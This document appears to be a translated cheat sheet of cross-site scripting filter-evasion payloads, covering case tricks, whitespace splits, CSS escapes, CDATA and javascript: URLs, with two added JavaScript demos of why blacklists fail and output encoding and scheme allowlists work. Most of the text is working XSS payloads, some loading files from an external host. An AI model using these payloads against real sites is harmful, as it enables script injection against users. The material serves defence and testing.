1. Change the case of characters

   A filter that matches "<script" literally misses a mixed-case tag; the HTML parser treats tag names case-insensitively.

   <sCript>alert('d')</scRipT>
2. Add extra characters to evade the regular-expression check

   The stray characters break a filter that pairs up "<" and ">" and compares the tag name, or that expects a well-formed attribute list; the browser's tolerant parser still recovers a script tag.

   <<script>alert('c')//<</script>

   <SCRIPT a=">" SRC="t.js"></SCRIPT>
   <SCRIPT =">" SRC="t.js"></SCRIPT>
   <SCRIPT a=">" " SRC="t.js"></SCRIPT>
   <SCRIPT "a='>'" SRC="t.js"></SCRIPT>
   <SCRIPT a=`>` SRC="t.js"></SCRIPT>
   <SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another extension instead of .js

   The browser ignores the file extension and runs whatever the server returns for the script request; only the response's Content-Type, together with X-Content-Type-Options: nosniff, stops a non-JavaScript MIME type from executing as script.

   <script src="bad.jpg"></script>
4. Put the JavaScript inside a CSS file

   <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

   Example contents of xss.css:

   body {
     background-image: url('javascript:alert("XSS");')
   }
5. Insert other characters inside the script tag

   A "/" is accepted by the parser as a separator between the tag name and its attributes, so a filter that expects "<script " (with a space) never matches.

   <SCRIPT/SRC="t.js"></SCRIPT>
   <SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade

   The URL parser discards ASCII tab and newline characters inside a scheme, so "javascript:" split by them is still recognised, while a filter looking for the literal string is not triggered. The gaps below are literal tab or newline characters (written as [TAB] and [NEWLINE] here because they do not survive copy and paste).

   <img src="jav[TAB]ascr[TAB]ipt:alert('XSS3')">          -> tab

   <IMG SRC="jav[NEWLINE]ascript:alert('XSS');">           -> newline
7. Use "\" to evade

   CSS treats a backslash as an escape that can be dropped, and "/* */" comments as whitespace, so the tokens "@import", "javascript" and "expression" can be broken up arbitrarily inside a style sheet or a style attribute.

   <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

   <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

   <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

   <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

   <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" after each character reference can also be dropped)

   The hex-encoded forms of the payloads are not preserved in this copy of the post; their decoded "original source" forms are:

   Original source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

   Original source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
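Sections 1 through 8 all defeat the same kind of defence: a blacklist that looks for literal strings in the input. The following example is added here and is not code from the original post. It builds a hypothetical blacklist filter of that kind, feeds it the payloads from sections 1, 2, 5 and 6 (written as JavaScript string literals, with the tab trick as "\t"), and shows that every one of them survives, whereas contextual HTML output encoding renders all of them inert. The "looksExecutable" oracle is a normalising check written only for this demonstration; the real oracle is the browser's parser.

```javascript
// Added demo (not from the original post). A blacklist filter matches literal
// strings; the HTML parser tolerates case changes, stray characters and
// whitespace. The fix is to encode output for its context, not to filter.

const BLOCKED_TAGS = new Set(["script", "iframe", "object", "embed"]);

// Hypothetical blacklist filter of the kind these payloads were built against:
// drops "<...>" spans whose first word is a blocked tag name and deletes the
// literal string "javascript:".
function naiveBlacklist(input) {
  return input
    .replace(/<([^>]*)>/g, (whole, inner) =>
      BLOCKED_TAGS.has(inner.split(/\s/)[0]) ? "" : whole)
    .replace(/javascript:/g, "");
}

// Contextual output encoding for HTML text and quoted attribute values: every
// character the parser could treat as markup becomes an entity, so the browser
// only ever sees text.
function encodeForHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Oracle for this demo only (a real check is the browser itself): after
// removing the whitespace tricks from section 6 and lower-casing, does the
// markup still open a script tag or carry a javascript: scheme inside a tag?
function looksExecutable(html) {
  const norm = html.replace(/[\t\n\r]/g, "").toLowerCase();
  return /<script[\s\/>]/.test(norm) || /<[^>]*javascript:/.test(norm);
}

// Payloads taken from sections 1, 2, 5 and 6 above (tabs written as \t).
const PAYLOADS = [
  "<sCript>alert('d')</scRipT>",
  "<<script>alert('c')//<</script>",
  "<SCRIPT/SRC=\"t.js\"></SCRIPT>",
  "<img src=\"jav\tascr\tipt:alert('XSS3')\">",
];

// Number of payloads that are still executable after the given treatment.
function countExecutable(transform) {
  return PAYLOADS.filter((p) => looksExecutable(transform(p))).length;
}

console.log("plain <script> stopped by blacklist:",
  !looksExecutable(naiveBlacklist("<script>alert(1)</script>")));
console.log("evasions surviving blacklist:", countExecutable(naiveBlacklist), "of", PAYLOADS.length);
console.log("evasions surviving encoding:  ", countExecutable(encodeForHtml), "of", PAYLOADS.length);
```

The blacklist does stop the textbook "<script>alert(1)</script>", which is exactly why filters like it ship; it stops none of the four variants. Encoding wins because it does not try to recognise attacks at all: it makes the parser's job unambiguous. Where user-supplied HTML genuinely has to be rendered, the same principle means an allowlist sanitizer that parses the markup, not a regular expression over the raw string.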
9. Script inside an HTML tag (event handler attributes)

   <body onload="alert('onload')">

   Any event handler attribute carries script, so blocking a few names is pointless; the list of candidates includes:

   onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside a swf file

   <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and let the browser reassemble it

   In an IE XML data island the CDATA sections (or an XML comment) split the string "javascript:" so that a filter scanning the raw markup never sees it; when the bound SPAN renders the field as HTML, the pieces are joined back together.

   <XML ID=I><X><C>
   <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
   </C></X>
   </XML>

   <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

   <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

   <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME

   IE's HTML+TIME behaviour can set innerHTML from markup; a deferred script inserted this way still runs.

   <HTML><BODY>
   <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
   <?import namespace="t" implementation="#default#time2">
   <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert('XSS')</SCRIPT>">
   </BODY></HTML>
13. Write a cookie via META

   The cookie value is set client-side; the XSS fires when the application later reflects the cookie into a page without encoding it.

   <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

   <IFRAME SRC=javascript:alert('13')></IFRAME>

   <img src="javascript:alert('XSS3')">

   <IMG DYNSRC="javascript:alert('XSS20')">

   <IMG LOWSRC="javascript:alert('XSS21')">

   <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

   <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

   <TABLE BACKGROUND="javascript:alert('XSS29')">

   <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

   <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

   <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

   Note on applicability: many of these vectors are specific to old Internet Explorer. CSS expression(), DYNSRC, LOWSRC, HTML+TIME, XML data islands with DATASRC binding, META Set-Cookie and Flash AllowScriptAccess are all gone from current browsers, and no current browser executes a javascript: URL in an image, stylesheet or CSS url() context. javascript: URLs still run in navigation contexts such as a href and iframe/frame src, event handler attributes still run everywhere, and the case, whitespace and encoding tricks in sections 1 to 8 still defeat string-matching filters. The defence is the same in every case: contextual output encoding, an allowlist sanitizer that parses HTML for any markup that must be rendered, and a scheme allowlist for any URL placed in an attribute.
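The javascript: vectors in section 14 are usually met with a check such as "reject values that start with javascript:", which the case trick from section 1, the tab and newline trick from section 6 and the numeric character references from section 8 all defeat. The following example is added here and is not code from the original post. It compares that naive check with a scheme allowlist built on the WHATWG URL parser (Node's built-in `new URL()`), which removes ASCII tab and newline from its input, strips leading control characters and spaces, and lower-cases the scheme before comparison. The entity decoder is a hypothetical stand-in for what the HTML parser does to an attribute value before the URL parser sees it; the evasion strings are constructed from the page's payloads.

```javascript
// Added demo (not from the original post). Validating a URL that will land in
// an href/src attribute: string matching loses to the tricks in sections 1, 6
// and 8; parsing with the URL parser and allowlisting the scheme does not.

// Decode numeric character references (&#x09; / &#9;, with or without ";")
// the way the HTML parser would before the value reaches the URL parser.
// Hypothetical helper: a real sanitizer reads the already-decoded DOM attribute.
function decodeNumericEntities(value) {
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => String.fromCodePoint(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => String.fromCodePoint(parseInt(dec, 10)));
}

// The check the payloads below are built to evade.
function naiveSchemeCheck(value) {
  return !value.startsWith("javascript:");
}

// Allowlist check. new URL() drops ASCII tab/newline anywhere in the input,
// strips leading C0 controls and spaces and lower-cases the scheme, so every
// evasion collapses to a plain "javascript:" protocol and is rejected.
// Relative URLs resolve against the (assumed) site base and are accepted.
function isSafeUrl(value, base = "https://example.com/") {
  let parsed;
  try {
    parsed = new URL(decodeNumericEntities(value), base);
  } catch {
    return false; // unparsable input: reject rather than guess
  }
  return parsed.protocol === "http:" || parsed.protocol === "https:";
}

// Constructed inputs based on sections 1, 6, 8 and 14 above.
const EVASIONS = [
  "javascript:alert('13')",        // literal form: the only one the naive check stops
  "JaVaScRiPt:alert(1)",           // section 1: case change
  "jav\tascr\tipt:alert('XSS3')",  // section 6: embedded tabs
  "jav\nascript:alert('XSS')",     // section 6: embedded newline
  "jav&#x09;ascript:alert(1)",     // section 8: hex character reference
  "jav&#9ascript:alert(1)",        // section 8: decimal reference, no ";"
  " \u0001javascript:alert(1)",    // leading space and control character
];

// How many of the evasions each check lets through.
function passesNaive() {
  return EVASIONS.filter((v) => naiveSchemeCheck(v)).length;
}
function passesAllowlist() {
  return EVASIONS.filter((v) => isSafeUrl(v)).length;
}

console.log("evasions accepted by naive check:", passesNaive(), "of", EVASIONS.length);
console.log("evasions accepted by allowlist:  ", passesAllowlist(), "of", EVASIONS.length);
```

The allowlist answers only the question "is this scheme one we render?"; a protocol-relative value such as "//evil.example/x" resolves to https: and passes, so restricting hosts is a separate decision layered on top. Rejecting anything the parser cannot handle, instead of falling back to string inspection, is deliberate: an input that confuses the parser is exactly the input an attacker wants through.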